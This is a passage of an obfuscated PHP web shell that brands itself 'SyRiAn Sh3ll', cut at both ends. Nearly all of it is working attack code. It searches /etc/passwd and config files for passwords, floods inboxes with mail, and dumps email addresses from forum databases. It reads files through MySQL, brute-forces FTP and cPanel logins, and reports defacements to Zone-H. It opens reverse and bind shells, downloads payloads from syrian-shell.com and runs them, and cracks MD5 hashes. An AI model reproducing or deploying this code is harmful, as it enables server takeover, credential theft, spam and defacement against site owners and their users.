\x46\x6f\x75\x6e\x64\x65d ".sizeof($users)." \145\x6e\164r\x79\x73 \151\x6e /\x65\x74\x63/passwd "; echo "[+] \x46\x6fu\156\144\145d ".sizeof($i1lo1iol011OI0O0)." \x72ea\144\x61\x62\x6ce pu\142lic_\150\164\155l \x64ir\145\143t\x6fr\151\145s "; echo "[~] \123\x65\141r\x63\x68\151n\147 \x66\157\162 \160a\163\163\x77\157\162\144\163 i\x6e config.* \x66\151\154e\163... "; foreach ($users as $user) { $path="/h\157me/$user/\160ub\x6c\151\143_h\x74m\154/"; il0oll1olll0Io1l($path,$user); } echo "[+] \x44\157\x6ee"; } else if($_POST['sendMailStorm']) { $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ) { for ($i = 0; $i < $nom ; $i++) { $from = rand (71,1020000000).""."At\x74a\x63\153e\x72.\x63\x6f\155"; $ioOi1OOooo10oI1o= md5("$from"); if(mail($to,$ioOi1OOooo10oI1o,$Comments,"\106r\x6fm:$from")) echo "[+] $i s\160\x61m\155\x65d !! "; else {echo "[-] $i \x46\141i\x6c\x65\144 !! ";} } } } else if($_POST['emailExtractorHelp']) { echo "\x54\x68\x69\163 \x69s \123o\155\145 Ta\x62\154es \x4e\x61\155\x65 & C\x6fl\x75\x6d\x6e\x73 N\141\155\x65 Fo\x72 \x53\157\155\x65 \x46\141\x6d \x53\x63\162ip\x74s .. [+] \126\x42u\x6c\154\145t\x69\156 \124able-name : user \143\x6f\154\165\x6d\x6e-name : email [+] W\x6frd\x50re\163\x73 \x54\141\x62l\145-name : w\160_u\x73er\x73 \x63\x6flum\156-name : \165\163e\x72_\145m\141i\x6c [+] J\157oml\141 \x54\141\x62le-name : \152o\x73_\x75\163\145r\163 c\157lumn-name : email [+] \120\110P\x42\102 \124\141\142\x6ce-name : p\x68p\x62\x62_\x75\x73\145\162\x73 \143ol\165\x6dn-name : \x75\x73\x65r_\x65mai\154 [+] \x49.P.\x42o\141r\144 \124a\142\x6c\145-name : ib\146_\x6d\x65\x6d\142\x65\162\x73 c\157\x6c\x75m\156-name : email [+] S\115\106 T\x61\142\x6ce-name : \x73mf_\155\x65m\142\145\162s \x63\157\x6c\165\155n-name : e\155\141\151\154\x41\144\x64r\x65s\x73 "; } else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'SQLQuery')) { $query = stripslashes($_POST['QU']); iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iIIi1l1OiOi0IO0l = mysql_query($query); $fields = i0IOlii1OIloli0l($iIIi1l1OiOi0IO0l); while ($rows = mysql_fetch_row($iIIi1l1OiOi0IO0l)) { for ($i = 0; $i < sizeof($rows); $i++) { if (is_null($rows[$i])) {$rows[$i] = "[NULL]";} elseif (ereg("^[[:\x73p\x61c\145:]]*$",$rows[$i])) {$rows[$i] = "[NULL]";} else {$rows[$i] = htmlspecialchars($rows[$i]);} echo $rows[$i]." "; } echo " "; } } else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'SQLReader')) { iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iO0li0OOi10o0Iil = uniqid('N'); $file = str_replace('\\\\','\\',$_POST['file']); $query = array( "\103RE\x41\124\x45 \x54EM\x50\x4f\122\x41\122\131 T\101\102L\x45 $iO0li0OOi10o0Iil (\146\151\x6c\145 \114O\x4e\107\102L\x4f\x42)", "\x4c\x4f\101\104 \x44\101\x54\x41 \111\116FI\114E '".mysql_real_escape_string($file)."' \x49\x4eTO TA\x42\114E $iO0li0OOi10o0Iil", "\123\x45\x4c\105\103T * FROM $iO0li0OOi10o0Iil" ); foreach($query as $iI1IoIolO0OI0OII) { $mysqlQuery = mysql_query($iI1IoIolO0OI0OII,$connect); while($line = mysql_fetch_row($mysqlQuery)) echo htmlspecialchars($line[0]); echo " "; } } else if($_POST['MySQLQuery'] && ($_POST['SQLType'] == 'EmailExtractor')) { iIO0io1IO0OI1lii($_POST['QU_HOST'],$_POST['QU_USER'],$_POST['QU_PASS'],$_POST['QU_DB']); $iOiii01iii0Ioi0I = $_POST['EM_TABLE']; $i10I1o1llOiIiOol = $_POST['EM_COLUMN']; $sql = mysql_query("\123\x45\x4cE\x43\x54 * FROM $iOiii01iii0Ioi0I"); while($i0IoililO0ooIl01 = mysql_fetch_array($sql)) {echo ''.$i0IoililO0ooIl01["$i10I1o1llOiIiOol"].' ';} } else if($_POST['editFileSubmit']) { $fileName = stripslashes($_POST['editFile']); chdir(stripslashes($_POST['currentPath'])); if(!file_exists($fileName)){echo "[-] \x53\x68it ! W\x68\145r\145 \x69\x73 \164he \106\151\154\145 ? \n[+] \x4e\157\167 y\157\165 \x63a\x6e write \x74h\x65 n\145\167 \x66\151\154e content ";} else{ if($_POST['actionType'] == 'edit'){echo htmlspecialchars(file_get_contents($fileName));} else if($_POST['actionType'] == 'rename'){rename($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'copy'){copy($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'deleteFile'){DeleteFile($fileName);} else if($_POST['actionType'] == 'deleteFolder'){DeleteFolder($fileName);} else if($_POST['actionType'] == 'createFile'){iii0li0iIOii1III($fileName,$_POST['newName']);} else if($_POST['actionType'] == 'createFolder'){mkdir($fileName);} else if($_POST['actionType'] == 'zip'){iOIoi1lOOI00I10I($fileName,getcwd()); } else if($_POST['actionType'] == 'unzip'){UnZip($fileName,getcwd());} else if($_POST['actionType'] == 'tar'){ Exe('tar -zcf '.$fileName." ".$fileName);} else if($_POST['actionType'] == 'untar'){ Exe ('tar -zxf '.$fileName);} else if($_POST['actionType'] == 'gz'){Exe('tar -czvf '.$fileName." ".$fileName);} else if($_POST['actionType'] == 'ungz'){Exe('gzip -d '.$fileName);} } } else if($_POST['saveEditedFile']) { chdir(stripslashes($_POST['currentPath'])); $ioillo0oioi0lIiI = iii0li0iIOii1III($_POST['file2edit'],$_POST['ExecutionArea']); if($ioillo0oioi0lIiI){echo "[+] \x46\x69\154\x65 \x53a\x76\x65d !";} else {echo "[-] F\141\x69led T\x6f Sa\x76e \106\x69\x6ce !!";} } else if($_POST['SendNowToZoneH']) { ob_start(); $iiIoloOoo0OlOIlI = get_loaded_extensions(); if(!in_array("curl", $iiIoloOoo0OlOIlI)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $il1Iiio010o1I0il = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[-] \131o\165 \115u\x73t \x46i\x6c\x6c t\x68\145 \x41t\x74\141\x63\x6b\x65\162 name !");} elseif($method == "--------S\105L\105\x43\x54--------") {die("[-] \x59\157u \115\x75\x73\164 \x53\x65le\x63\164 T\150\145 M\145t\150\157\x64 !");} elseif($il1Iiio010o1I0il == "--------\x53E\114EC\x54--------") {die("[-] \131\x6fu \115\x75\163\164 \x53e\154\x65\143t \x54h\x65 \x52\145\x61\163\157\x6e");} elseif(empty($site)) {die("[-] \131\157u \115\165\163t \111\x6et\145\162 the S\x69\x74e\163 \114\151\x73t ! ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "h\x74\x74\160") {$sites[$i] = "\x68\x74tp://".$sites[$i];} i1ol1ilOlIoIOOII("h\x74\164\x70://\x7a\157\156\145-\150.org/\156o\x74\151\x66y/\x73\151ng\x6c\x65", $hacker, $method, $il1Iiio010o1I0il, $sites[$i]); echo "\x53\x69t\145 : ".$sites[$i]." D\x65f\x61c\145d !\n"; ++$i; } echo "[+] Send\151\156g \x53i\164\145\x73 To Zo\x6ee-\x48 H\141s B\x65e\x6e Com\x70l\x65t\145\144 \123\165\143\143es\163\146\165\x6cl\171 !! "; } else if($_POST['BruteForceCpanelAndFTP']) { $iIlIlii0OOIiiOo0=5; set_time_limit(0); $submit = $_REQUEST['BruteForceCpanelAndFTP']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $cracktype = $_REQUEST['cracktype']; if(empty($target)){$target = "127.0.0.1";} function iO1li1i0looIiOil($host,$user,$pass,$timeout) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, "ftp://$host"); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FTPLISTONLY, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($i0o1iOil1oIoI0I1, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FAILONERROR, 1); $data = curl_exec($i0o1iOil1oIoI0I1); if ( curl_errno($i0o1iOil1oIoI0I1) == 28 ) { print "\x45r\x72o\x72 : \103\x6f\156\156\145\143t\x69\157\x6e \x54im\145\x6f\165t \120lea\x73e \103\x68\x65\x63k \x54h\145 \x54\x61r\x67\x65\x74 H\x6f\163t\156\x61\x6d\145 ."; exit; } elseif ( curl_errno($i0o1iOil1oIoI0I1) == 0 ){print "[+] \x43\x72\141\x63\153\151\x6eg \123u\x63\x63\x65\x73\163 \127i\164\150 Username ($user) \x61\x6ed \120\x61\163\x73\x77\x6f\162\x64 ($pass)";} curl_close($i0o1iOil1oIoI0I1); } function i10l1llOi0IOliIl($host,$user,$pass,$timeout) { $i0o1iOil1oIoI0I1 = curl_init(); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_URL, "\x68\164\164\x70://$host:2082"); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($i0o1iOil1oIoI0I1, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_FAILONERROR, 1); $data = curl_exec($i0o1iOil1oIoI0I1); if ( curl_errno($i0o1iOil1oIoI0I1) == 28 ) { print "[-] \103\x6fn\x6e\145\143\x74\151o\x6e T\151\x6d\x65\157u\164 Ple\x61\x73\145 \x43h\145\143\153 Th\x65 \x54\141\162\147\145t \110os\x74n\141\x6de ."; exit; } elseif ( curl_errno($i0o1iOil1oIoI0I1) == 0 ){print "[+] \103\x72\141c\153in\147 \x53ucc\x65\163\x73 \x57i\164\x68 Username ($user) \141\156\144 \120a\163s\x77\157rd ($pass)";} curl_close($i0o1iOil1oIoI0I1); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)){ print "[-] \120\x6c\145a\x73\145 C\150\145ck T\x68\145 Users \x6f\x72 \x50as\163\x77\157r\x64 \114\x69\x73t \x45\x6et\162\171 . . .";} if(empty($users)){ print "[-] \x50\154\x65a\x73\x65 C\x68\145\143k Th\x65 Users Lis\x74 E\156\x74\x72y . . ."; } if(empty($pass)){ print "[-] \x50le\141\x73\x65 C\150\145ck T\150\x65 \x50\x61\163\163\167\x6f\x72\144 \114\151\x73t \105n\x74\162y . . ";} $iOl0looOiioliIll=explode("\n",$users); $i1l01iO1oiOiI100=explode("\n",$pass); print "[~]# C\x72a\143k\151\156\147 \x50\162\157c\145\163\163 \123\164\141\x72\x74\145d, \x50\154\145\141s\145 W\x61\151t ..."; foreach ($iOl0looOiioliIll as $user) { $ilIliil0l0o1I0l1 = trim($user); foreach ($i1l01iO1oiOiI100 as $password ) { $iliIll1Oi0O0IIll = trim($password); if($cracktype == "ftp") { iO1li1i0looIiOil($target,$ilIliil0l0o1I0l1,$iliIll1Oi0O0IIll,$iIlIlii0OOIiiOo0); } if ($cracktype == "\x63pa\x6e\x65\154") { i10l1llOi0IOliIl($target,$ilIliil0l0o1I0l1,$iliIll1Oi0O0IIll,$iIlIlii0OOIiiOo0); } } } } } else if($_POST['backconn']) { set_time_limit (0); $ip = trim($_POST['ip']); $port = trim($_POST['backport']); $back_pass = trim($_POST['back_pass']); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); echo "[~] \165\x73\x65 \164\x68is \x43\157\x6d\x6d\x61n\x64 \x69n \116\145\164\103a\164 : \156\143 -\166\154p [Y\157ur \x50OR\x54]"; if($_POST['use'] == 'php1') { $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if($sock < 0){die("[-] \146\141i\154\145\x64 to \x63\x72\x65\x61\164\145 socket.");} $result = socket_connect($sock, $ip, $port); if($result < 0){die("[-] \146\x61i\x6c\x65\144 to connect \142a\x63k to host:".$_GET['host']);} $i01O1l1ilooiI10O = "\n\n -== S\x79\x52\151A\x6e \x53h\x33l\x6c , \x42a\x63k \103on\156\145c\x74io\156 ==-\n$"; socket_write($sock, $i01O1l1ilooiI10O, strlen($i01O1l1ilooiI10O)); while($input = socket_read($sock, 10000)) { $result = `$input`; $result .= "\n$ "; socket_write($sock, $result, strlen($result)); } } else if ($_POST['use'] == 'php2') { $iOIliloO0iIo11Ol = 1400; $iliO10o1oO0l1IIo = null; $i000iiO0iOoI0OIl = null; $shell = 'uname -a; w; id; /bin/sh -i'; $il0I100001iI00O1 = 0; $i110lOol1i0IOOIo = 1; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] E\x52\x52\117\x52: \x43an'\x74 \146or\x6b"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] E\162\x72\x6fr: Ca\156't \163\x65\164\x73\x69\144()"); exit(1); } $il0I100001iI00O1 = 1; } else { printit("[-] WARN\x49\116\107: \x46ai\x6ce\144 to \144\141\x65\x6d\157\x6e\x69\163e. \124\150\x69\163 is \161u\x69\x74\145 c\x6f\x6d\x6d\157n an\144 \x6e\157\x74 \x66a\x74al."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $il1Oi1OoO11I1OiI, $i1Oli10olOiIlloI, 30); if (!$sock) { printit("$i1Oli10olOiIlloI ($il1Oi1OoO11I1OiI)"); exit(1); } $i0ii10l00loI0IiI = array( 0 => array("p\x69\x70e", "r"), 1 => array("\160\151\x70\x65", "\167"), 2 => array("\x70ipe", "w") ); $process = proc_open($shell, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I); if (!is_resource($process)) { printit("[-] \x45\122\x52OR: \103\x61\156't \163\160a\x77\x6e shell"); exit(1); } stream_set_blocking($ilOIi1011iloIl1I[0], 0); stream_set_blocking($ilOIi1011iloIl1I[1], 0); stream_set_blocking($ilOIi1011iloIl1I[2], 0); stream_set_blocking($sock, 0); printit("[+] \x53\x75\x63\143\x65\163\163\x66\165\x6c\154y o\x70e\156e\144 r\145\166\145rs\x65 shell to $ip:$port"); while (1) { if (feof($sock)) { printit("[-] E\x52\x52O\x52: \x53h\145l\154 \143\x6f\x6e\x6e\145\143ti\157\x6e \164\145r\155i\x6e\x61te\144"); break; } if (feof($ilOIi1011iloIl1I[1])) { printit("[-] \x45R\122\117\122: \123\x68\145\154\154 process \164\145\x72mi\x6ea\x74ed"); break; } $i1IIi11O1iOiI010 = array($sock, $ilOIi1011iloIl1I[1], $ilOIi1011iloIl1I[2]); $iiOol1oOii0OIilO = stream_select($i1IIi11O1iOiI010, $iliO10o1oO0l1IIo, $i000iiO0iOoI0OIl, null); if (in_array($sock, $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\x53\x4f\103\x4b \122EA\x44"); $input = fread($sock, $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("S\117\x43\x4b: $input"); fwrite($ilOIi1011iloIl1I[0], $input); } if (in_array($ilOIi1011iloIl1I[1], $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\123\124\x44\117UT R\x45A\x44"); $input = fread($ilOIi1011iloIl1I[1], $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("\123\124\104O\125\124: $input"); fwrite($sock, $input); } if (in_array($ilOIi1011iloIl1I[2], $i1IIi11O1iOiI010)) { if ($i110lOol1i0IOOIo) printit("\123\124D\105\122R \x52EA\104"); $input = fread($ilOIi1011iloIl1I[2], $iOIliloO0iIo11Ol); if ($i110lOol1i0IOOIo) printit("\123TDE\x52R: $input"); fwrite($sock, $input); } } fclose($sock); fclose($ilOIi1011iloIl1I[0]); fclose($ilOIi1011iloIl1I[1]); fclose($ilOIi1011iloIl1I[2]); proc_close($process); } else if ($_POST['use'] == "p\150\x70\063-\167\151\156") { $i0Oll100O0OIiIli=array('path' => 'c:\\windows\\system32'); $i0ii10l00loI0IiI = array( 0 => array("\160\x69pe","\x72"), 1 => array("p\151\x70e","\167"), 2 => array("\x66\x69l\x65","l\x6fg.t\170\x74","a")); } else if ($_POST['use'] == "\x70h\160\x33-\154\x69n\165x") { $i0Oll100O0OIiIli = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); $i0ii10l00loI0IiI = array( 0 => array("p\x69\160\x65","r"), 1 => array("\x70i\x70\145","w"), 2 => array("f\x69\x6ce","/tmp/\154\157\147.\164\170\x74","a")); } if (($_POST['use'] == "ph\x703-\154\x69n\165x") || ($_POST['use'] == "ph\160\x33-\167\x69\x6e")) { $ioO1lliO0110I0io=getprotobyname("t\x63\x70"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$ioO1lliO0110I0io))<0) { die("[-] Soc\x6b\145\x74 \103r\145a\164\x65 F\141\151\154e");} if(($iIl0ll1lo0l0I1IO=socket_connect($sock,$ip,$port))<0) { die("[-] \x43on\156\x65\143\x74 \x46\x61il\145");} else{ $message="----------------------\120H\x50 \x43\x6f\x6en\x65\x63t-B\141\x63k--------------------\n"; $message.="----------------------- \123\x79R\151\101\156 \x53h\063\154l --------------------\n"; socket_write($sock,$message,strlen($message)); $iolilOoo01OIoIo1=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$ioO1lliO0110I0io)) { if(trim(strtolower($cmd))=="\x65x\x69t"){socket_write($sock,"\102ye \102ye\n");exit;} else{ $process = proc_open($cmd, $i0ii10l00loI0IiI, $ilOIi1011iloIl1I, $iolilOoo01OIoIo1, $i0Oll100O0OIiIli); if (is_resource($process)) { fwrite($ilOIi1011iloIl1I[0], $cmd); fclose($ilOIi1011iloIl1I[0]); $msg=stream_get_contents($ilOIi1011iloIl1I[1]); socket_write($sock,$msg,strlen($msg)); fclose($ilOIi1011iloIl1I[1]); $iiiO1lli0OllIl0O = proc_close($process);} } } } } else if ($_POST['use'] == 'perl1') { iloOl1lloloI1loI('http://syrian-shell.com/back/perl1.zip'); UnZip('perl1.zip',getcwd()); DeleteFile('perl1.zip'); iI11i0Il0iO0iooi('perl1.sy3',0755); Exe('perl perl1.sy3 '.$ip." ".$port); } else if ($_POST['use'] == 'perl2') { iloOl1lloloI1loI('http://syrian-shell.com/back/perl2.zip'); UnZip('perl2.zip',getcwd()); DeleteFile('perl2.zip'); iI11i0Il0iO0iooi('perl2.sy3',0755); Exe('perl perl2.sy3 '.$ip." ".$port." ".$back_pass); } else if ($_POST['use'] == 'perl3-linux') { iloOl1lloloI1loI('http://syrian-shell.com/back/back3-linux.zip'); UnZip('back3-linux.zip',getcwd()); DeleteFile('back3-linux.zip'); iI11i0Il0iO0iooi('back3-linux.sy3',0755); Exe('perl back3-linux.sy3 '.$ip." ".$port); } else if ($_POST['use'] == 'perl4-win') { iloOl1lloloI1loI('http://syrian-shell.com/back/back4-win.zip'); UnZip('back4-win.zip',getcwd()); DeleteFile('back4-win.zip'); iI11i0Il0iO0iooi('back4-win.sy3',0755); Exe('perl back4-win.sy3 '.$ip." ".$port); } else if ($_POST['use'] == 'php4') {ilII1oOlIo10I0oi('cb', "", $port, $ip);} else if ($_POST['use'] == 'c1') {i1O11101l1IllolO('/tmp', 'gcc', $ip , $port); } } else if($_POST['bind']) { set_time_limit (0); $i0oI1OlOO0II0o00 = trim($_POST['bind_pass']); $port = trim($_POST['port']); iloOl1lloloI1loI('http://www.syrian-shell.com/cgi/compiler.zip'); UnZip('compiler.zip',getcwd()); DeleteFile('compiler.zip'); iI11i0Il0iO0iooi("compiler",0777); echo "[~] \165\163\x65 t\150i\163 \103\157\x6d\155a\156\x64 \x69\156 \x4ee\164\103at : n\x63 –v –n [\123\145\x72\x76\145\162 ip] [port]"; if($_POST['use'] == 'php1') { $i0lll1o0olioIlOI = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_bind($i0lll1o0olioIlOI,'127.0.0.1', $port) or die('[-] Could not bind to address'); socket_listen($i0lll1o0olioIlOI, 5); $iooIil00loIOOIii = socket_accept($i0lll1o0olioIlOI); $input = socket_read($iooIil00loIOOIii, 1024); echo $input; socket_close($iooIil00loIOOIii); socket_close($i0lll1o0olioIlOI); } else if ($_POST['use'] == 'perl1-linux') { iloOl1lloloI1loI('http://syrian-shell.com/bind/perl1-linux.zip'); UnZip('perl1-linux.zip',getcwd()); DeleteFile('perl1-linux.zip'); iI11i0Il0iO0iooi('perl1-linux.sy3',0755); Exe('perl perl1-linux.sy3 '.$port." ".$i0oI1OlOO0II0o00); } else if ($_POST['use'] == 'perl2-linux') { iloOl1lloloI1loI('http://syrian-shell.com/bind/perl2-linux.zip'); UnZip('perl2-linux.zip',getcwd()); DeleteFile('perl2-linux.zip'); iI11i0Il0iO0iooi('perl2-linux.sy3',0755); Exe('perl perl2-linux.sy3 '.$port); } else if ($_POST['use'] == 'bind3-win') { iloOl1lloloI1loI('http://syrian-shell.com/bind/bind3-win.zip'); UnZip('bind3-win.zip',getcwd()); DeleteFile('bind3-win.zip'); iI11i0Il0iO0iooi('bind3-win.sy3',0755); Exe('perl bind3-win.sy3 '.$port); } else if ($_POST['use'] == 'php2') {ilII1oOlIo10I0oi('pb',"", $port, $ip) ;} else if ($_POST['use'] == 'c1') { iloOl1lloloI1loI('http://syrian-shell.com/bind/bind4-linux-c.zip'); UnZip('bind4-linux-c.zip',getcwd()); DeleteFile('bind4-linux-c.zip'); iI11i0Il0iO0iooi('bind4-linux-c.c',0777); Exe('gcc -o bind4-linux-c.c bind4-linux-c'); Exe('./bind4-linux-c -s /bin/sh -c girl -r /home -w '.$i0oI1OlOO0II0o00.' -p '.$port.''); } } elseif($_POST['CrackMd5']) { set_time_limit(0); function i0i11l11O1I0IOIi() { set_time_limit(0); $chars=$_POST['chars']; $chars=str_replace("<",chr(60),$chars); $chars=str_replace(">",chr(62),$chars); $c=strlen($chars); for ($next = 0; $next <= 31; $next++) { for ($iI0llooOoioiI1iI = 0; $iI0llooOoioiI1iI <= $c; $iI0llooOoioiI1iI++) { $iOoI1oOi0o0OlI0O[1] = $chars{$iI0llooOoioiI1iI}; for ($iIiIi0o1o00OI0oi = 0; $iIiIi0o1o00OI0oi <= $c; $iIiIi0o1o00OI0oi++) { $iOoI1oOi0o0OlI0O[2] = $chars{$iIiIi0o1o00OI0oi}; if ($next <= 2) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1i0loOlioi1I110 = 0; $i1i0loOlioi1I110 <= $c; $i1i0loOlioi1I110++) { $iOoI1oOi0o0OlI0O[3] = $chars{$i1i0loOlioi1I110}; if ($next <= 3) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ii001o01l1ioIioi = 0; $ii001o01l1ioIioi <= $c; $ii001o01l1ioIioi++) { $iOoI1oOi0o0OlI0O[4] = $chars{$ii001o01l1ioIioi}; if ($next <= 4) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iIOiiOoll1liI0O0 = 0; $iIOiiOoll1liI0O0 <= $c; $iIOiiOoll1liI0O0++) { $iOoI1oOi0o0OlI0O[5] = $chars{$iIOiiOoll1liI0O0}; if ($next <= 5) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iOII1Ol0000OI1o0 = 0; $iOII1Ol0000OI1o0 <= $c; $iOII1Ol0000OI1o0++) { $iOoI1oOi0o0OlI0O[6] = $chars{$iOII1Ol0000OI1o0}; if ($next <= 6) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiIii0lOO0OiIlI0 = 0; $iiIii0lOO0OiIlI0 <= $c; $iiIii0lOO0OiIlI0++) { $iOoI1oOi0o0OlI0O[7] = $chars{$iiIii0lOO0OiIlI0}; if ($next <= 7) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioIO1OiO0OlOIi1O = 0; $ioIO1OiO0OlOIi1O <= $c; $ioIO1OiO0OlOIi1O++) { $iOoI1oOi0o0OlI0O[8] = $chars{$ioIO1OiO0OlOIi1O}; if ($next <= 8) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($il10i0iOo0iiIil0 = 0; $il10i0iOo0iiIil0 <= $c; $il10i0iOo0iiIil0++) { $iOoI1oOi0o0OlI0O[9] = $chars{$il10i0iOo0iiIil0}; if ($next <= 9) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioliiOOOO11oIOoi = 0; $ioliiOOOO11oIOoi <= $c; $ioliiOOOO11oIOoi++) { $iOoI1oOi0o0OlI0O[10] = $chars{$ioliiOOOO11oIOoi}; if ($next <= 10) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ioOOlOOooiilI1Oo = 0; $ioOOlOOooiilI1Oo <= $c; $ioOOlOOooiilI1Oo++) { $iOoI1oOi0o0OlI0O[11] = $chars{$ioOOlOOooiilI1Oo}; if ($next <= 11) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iliIlo0oio0oIOlI = 0; $iliIlo0oio0oIOlI <= $c; $iliIlo0oio0oIOlI++) { $iOoI1oOi0o0OlI0O[12] = $chars{$iliIlo0oio0oIOlI}; if ($next <= 12) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ilIii0O0iooiI1o0 = 0; $ilIii0O0iooiI1o0 <= $c; $ilIii0O0iooiI1o0++) { $iOoI1oOi0o0OlI0O[13] = $chars{$ilIii0O0iooiI1o0}; if ($next <= 13) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiioiOOo10i0Iol1 = 0; $iiioiOOo10i0Iol1 <= $c; $iiioiOOo10i0Iol1++) { $iOoI1oOi0o0OlI0O[14] = $chars{$iiioiOOo10i0Iol1}; if ($next <= 14) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iilIio0Oi011IilO = 0; $iilIio0Oi011IilO <= $c; $iilIio0Oi011IilO++) { $iOoI1oOi0o0OlI0O[15] = $chars{$iilIio0Oi011IilO}; if ($next <= 15) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($il1Iloo01loOIiol = 0; $il1Iloo01loOIiol <= $c; $il1Iloo01loOIiol++) { $iOoI1oOi0o0OlI0O[16] = $chars{$il1Iloo01loOIiol}; if ($next <= 16) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1loio0OlloiIlOl = 0; $i1loio0OlloiIlOl <= $c; $i1loio0OlloiIlOl++) { $iOoI1oOi0o0OlI0O[17] = $chars{$i1loio0OlloiIlOl}; if ($next <= 17) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiOi1O00i11oIlOO = 0; $iiOi1O00i11oIlOO <= $c; $iiOi1O00i11oIlOO++) { $iOoI1oOi0o0OlI0O[18] = $chars{$iiOi1O00i11oIlOO}; if ($next <= 18) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i0oil0o0l111IloO = 0; $i0oil0o0l111IloO <= $c; $i0oil0o0l111IloO++) { $iOoI1oOi0o0OlI0O[19] = $chars{$i0oil0o0l111IloO}; if ($next <= 19) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($ilil1001o0o1IO0I = 0; $ilil1001o0o1IO0I <= $c; $ilil1001o0o1IO0I++) { $iOoI1oOi0o0OlI0O[20] = $chars{$ilil1001o0o1IO0I}; if ($next <= 20) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiO11O010oioIIo1 = 0; $iiO11O010oioIIo1 <= $c; $iiO11O010oioIIo1++) { $iOoI1oOi0o0OlI0O[21] = $chars{$iiO11O010oioIIo1}; if ($next <= 21) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iooilo0100llIO1l = 0; $iooilo0100llIO1l <= $c; $iooilo0100llIO1l++) { $iOoI1oOi0o0OlI0O[22] = $chars{$iooilo0100llIO1l}; if ($next <= 22) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i1l01Oo1o1o0II10 = 0; $i1l01Oo1o1o0II10 <= $c; $i1l01Oo1o1o0II10++) { $iOoI1oOi0o0OlI0O[23] = $chars{$i1l01Oo1o1o0II10}; if ($next <= 23) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i00lloOioiOlIIOI = 0; $i00lloOioiOlIIOI <= $c; $i00lloOioiOlIIOI++) { $iOoI1oOi0o0OlI0O[24] = $chars{$i00lloOioiOlIIOI}; if ($next <= 24) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($i10lioO1oii0IoIl = 0; $i10lioO1oii0IoIl <= $c; $i10lioO1oii0IoIl++) { $iOoI1oOi0o0OlI0O[25] = $chars{$i10lioO1oii0IoIl}; if ($next <= 25) { result(implode($iOoI1oOi0o0OlI0O)); }else { for ($iiiO1oOiO111IiOl = 0; $iiiO1oOiO111IiOl <= $c; $iiiO1oOiO111IiOl++) { $iOoI1oOi0o0OlI0O[26] = $chars{$iiiO1oOiO111IiOl}; if ($next <= 26) { result(implode($iOoI1oOi0o0OlI0O)); 